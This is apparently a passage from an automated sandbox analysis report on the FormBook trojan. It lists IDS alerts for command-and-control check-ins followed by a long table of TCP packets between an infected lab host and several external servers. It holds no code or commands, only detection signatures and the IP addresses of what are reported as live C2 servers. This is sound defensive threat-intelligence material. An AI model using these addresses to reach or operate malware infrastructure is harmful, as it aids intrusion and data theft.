                                                            07/03/24-17:35:31.783314TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34977880192.168.11.2074.208.236.230
                                                            07/03/24-17:41:34.589608TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24982880192.168.11.20142.202.6.230
                                                            07/03/24-17:35:39.849238TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24978180192.168.11.2074.208.236.230
                                                            07/03/24-17:41:07.282335TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34982180192.168.11.203.33.130.190
                                                            07/03/24-17:35:50.712765TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34978480192.168.11.20199.59.243.226
                                                            07/03/24-17:35:17.093039TCP2856318ETPRO TROJAN FormBook CnC Checkin (POST) M44977480192.168.11.20142.202.6.230
                                                            07/03/24-17:35:34.479335TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34977980192.168.11.2074.208.236.230
                                                            07/03/24-17:38:27.957124TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34980380192.168.11.20172.67.146.224
                                                            07/03/24-17:35:17.093039TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34977480192.168.11.20142.202.6.230
                                                            07/03/24-17:37:47.657326TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34979280192.168.11.2066.235.200.145
                                                            07/03/24-17:41:54.322753TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34983380192.168.11.20199.59.243.226
                                                            07/03/24-17:37:39.419517TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24979080192.168.11.203.33.130.190

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jul 3, 2024 17:34:50.928854942 CEST4977380192.168.11.2074.208.236.38
                                                            Jul 3, 2024 17:34:51.060997009 CEST804977374.208.236.38192.168.11.20
                                                            Jul 3, 2024 17:34:51.061212063 CEST4977380192.168.11.2074.208.236.38
                                                            Jul 3, 2024 17:34:51.075294971 CEST4977380192.168.11.2074.208.236.38
                                                            Jul 3, 2024 17:34:51.206506014 CEST804977374.208.236.38192.168.11.20
                                                            Jul 3, 2024 17:34:51.209486008 CEST804977374.208.236.38192.168.11.20
                                                            Jul 3, 2024 17:34:51.210201979 CEST804977374.208.236.38192.168.11.20
                                                            Jul 3, 2024 17:34:51.210398912 CEST4977380192.168.11.2074.208.236.38
                                                            Jul 3, 2024 17:34:51.217256069 CEST4977380192.168.11.2074.208.236.38
                                                            Jul 3, 2024 17:34:51.348463058 CEST804977374.208.236.38192.168.11.20
                                                            Jul 3, 2024 17:35:16.908240080 CEST4977480192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:17.077215910 CEST8049774142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:17.077454090 CEST4977480192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:17.093039036 CEST4977480192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:17.261955023 CEST8049774142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:18.260947943 CEST8049774142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:18.260988951 CEST8049774142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:18.261152029 CEST4977480192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:18.600378036 CEST4977480192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:19.629633904 CEST4977580192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:19.798841000 CEST8049775142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:19.799130917 CEST4977580192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:19.814647913 CEST4977580192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:19.983846903 CEST8049775142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:20.974178076 CEST8049775142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:20.974262953 CEST8049775142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:20.974549055 CEST4977580192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:21.318515062 CEST4977580192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:22.348077059 CEST4977680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:22.517293930 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:22.517529964 CEST4977680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:22.534113884 CEST4977680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:22.534220934 CEST4977680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:22.703469992 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:22.703538895 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:22.703586102 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:22.703628063 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:22.703665972 CEST4977680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:22.703712940 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:22.703913927 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:22.703921080 CEST4977680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:22.704051018 CEST4977680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:22.704210043 CEST4977680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:22.704375982 CEST4977680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:22.872818947 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:22.872881889 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:22.872947931 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:22.872997046 CEST4977680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:22.872997999 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:22.873162031 CEST4977680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:22.873330116 CEST4977680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:22.873394012 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:22.873502970 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:22.873584986 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:22.873631001 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:22.873662949 CEST4977680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:22.873852015 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:22.874059916 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:23.042215109 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:23.042732000 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:23.042815924 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:23.042857885 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:23.043215990 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:23.043272972 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:23.043576002 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:23.043633938 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:24.036623955 CEST4977680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:24.045949936 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:24.045962095 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:24.046207905 CEST4977680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:24.046207905 CEST4977680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:24.205694914 CEST8049776142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:24.205925941 CEST4977680192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:25.065705061 CEST4977780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:25.234958887 CEST8049777142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:25.235218048 CEST4977780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:25.248404980 CEST4977780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:25.417593002 CEST8049777142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:26.419451952 CEST8049777142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:26.419527054 CEST8049777142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:26.419915915 CEST4977780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:26.426525116 CEST4977780192.168.11.20142.202.6.230
                                                            Jul 3, 2024 17:35:26.595648050 CEST8049777142.202.6.230192.168.11.20
                                                            Jul 3, 2024 17:35:31.633918047 CEST4977880192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:31.765469074 CEST804977874.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:31.765652895 CEST4977880192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:31.783313990 CEST4977880192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:31.914894104 CEST804977874.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:31.921339989 CEST804977874.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:31.921499014 CEST804977874.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:31.921668053 CEST4977880192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:33.300287008 CEST4977880192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:34.329363108 CEST4977980192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:34.462241888 CEST804977974.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:34.462459087 CEST4977980192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:34.479335070 CEST4977980192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:34.612229109 CEST804977974.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:34.617757082 CEST804977974.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:34.617839098 CEST804977974.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:34.618031025 CEST4977980192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:35.987293959 CEST4977980192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:37.016534090 CEST4978080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:37.148089886 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.148288965 CEST4978080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:37.165724993 CEST4978080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:37.165774107 CEST4978080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:37.297372103 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.297429085 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.297465086 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.297493935 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.297522068 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.297553062 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.297622919 CEST4978080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:37.297801971 CEST4978080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:37.297959089 CEST4978080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:37.429321051 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.429403067 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.429457903 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.429503918 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.429549932 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.429598093 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.429631948 CEST4978080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:37.429646015 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.429706097 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.429760933 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.429816961 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.429821968 CEST4978080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:37.429868937 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.429915905 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.429929018 CEST4978080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:37.429966927 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.430011988 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.430057049 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.561655045 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.561714888 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.561810017 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.561851978 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.561891079 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.561937094 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.561980963 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.562021971 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.562061071 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.562099934 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.562186003 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.565179110 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.565257072 CEST804978074.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:37.565556049 CEST4978080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:38.674160957 CEST4978080192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:39.703495026 CEST4978180192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:39.835195065 CEST804978174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:39.835442066 CEST4978180192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:39.849237919 CEST4978180192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:39.980788946 CEST804978174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:39.987484932 CEST804978174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:39.988301992 CEST804978174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:39.988552094 CEST4978180192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:39.995572090 CEST4978180192.168.11.2074.208.236.230
                                                            Jul 3, 2024 17:35:40.127212048 CEST804978174.208.236.230192.168.11.20
                                                            Jul 3, 2024 17:35:45.237443924 CEST4978280192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:45.355931044 CEST8049782199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:45.356110096 CEST4978280192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:45.371922016 CEST4978280192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:45.490511894 CEST8049782199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:45.512809992 CEST8049782199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:45.512824059 CEST8049782199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:45.512842894 CEST8049782199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:45.513025999 CEST4978280192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:45.520230055 CEST8049782199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:45.520342112 CEST4978280192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:46.877832890 CEST4978280192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:47.906362057 CEST4978380192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:48.024961948 CEST8049783199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:48.025104046 CEST4978380192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:48.040883064 CEST4978380192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:48.159491062 CEST8049783199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:48.180605888 CEST8049783199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:48.180619955 CEST8049783199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:48.180629969 CEST8049783199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:48.180898905 CEST4978380192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:48.188020945 CEST8049783199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:48.188232899 CEST4978380192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:49.546717882 CEST4978380192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.576200008 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.695661068 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.695823908 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.712764978 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.712826014 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.712877035 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.831757069 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.831831932 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.831880093 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.831909895 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.831945896 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.831979990 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.832015038 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.832034111 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.832051039 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.832086086 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.832091093 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.832122087 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.832134008 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.832324982 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.950745106 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.950772047 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.950910091 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.950958014 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.951003075 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.951025009 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951047897 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951066017 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951141119 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951302052 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951318979 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951332092 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951442957 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951555014 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951572895 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951585054 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951597929 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951631069 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951643944 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951662064 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:50.951761961 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.951911926 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:50.952002048 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.069515944 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.069608927 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.069736004 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.069760084 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.070180893 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.070302963 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.070314884 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.070400000 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.070410013 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.070417881 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.070425034 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.070432901 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.092320919 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.092334032 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.092483997 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.092643023 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:51.092643023 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:51.096856117 CEST8049784199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:51.097033024 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:52.217983007 CEST4978480192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:53.247456074 CEST4978580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:53.365984917 CEST8049785199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:53.366111994 CEST4978580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:53.379725933 CEST4978580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:53.498301983 CEST8049785199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:53.523156881 CEST8049785199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:53.523170948 CEST8049785199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:53.523247957 CEST8049785199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:53.523474932 CEST4978580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:53.523474932 CEST4978580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:53.528054953 CEST8049785199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:53.528219938 CEST4978580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:53.530147076 CEST4978580192.168.11.20199.59.243.226
                                                            Jul 3, 2024 17:35:53.648566961 CEST8049785199.59.243.226192.168.11.20
                                                            Jul 3, 2024 17:35:58.700110912 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:35:59.715132952 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:01.714716911 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:05.729422092 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:13.743350029 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:20.789040089 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:21.804079056 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:23.819293022 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:27.834007025 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:35.847897053 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:42.892750978 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:43.893053055 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:45.908222914 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:49.922975063 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:36:57.936863899 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:37:04.980902910 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:37:05.981988907 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:37:07.997205019 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:37:12.011888981 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:37:20.025791883 CEST4978680192.168.11.20154.53.59.40
                                                            Jul 3, 2024 17:37:31.247034073 CEST4978780192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:31.365593910 CEST80497873.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:31.365864992 CEST4978780192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:31.398546934 CEST4978780192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:31.518363953 CEST80497873.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:31.538412094 CEST80497873.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:31.538630009 CEST4978780192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:32.914809942 CEST4978780192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:33.033356905 CEST80497873.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:33.944322109 CEST4978880192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:34.062877893 CEST80497883.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:34.063127995 CEST4978880192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:34.078990936 CEST4978880192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:34.197618961 CEST80497883.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:34.221664906 CEST80497883.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:34.221848011 CEST4978880192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:35.586122990 CEST4978880192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:35.704623938 CEST80497883.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.615638971 CEST4978980192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:36.734631062 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.734831095 CEST4978980192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:36.751774073 CEST4978980192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:36.751853943 CEST4978980192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:36.870771885 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.870831966 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.870876074 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.870915890 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.870995045 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.871010065 CEST4978980192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:36.871036053 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.871144056 CEST4978980192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:36.871264935 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.871310949 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.871350050 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.871351957 CEST4978980192.168.11.203.33.130.190
                                                            Jul 3, 2024 17:37:36.871392965 CEST80497893.33.130.190192.168.11.20
                                                            Jul 3, 2024 17:37:36.871527910 CEST4978980192.168.11.203.33.130.190
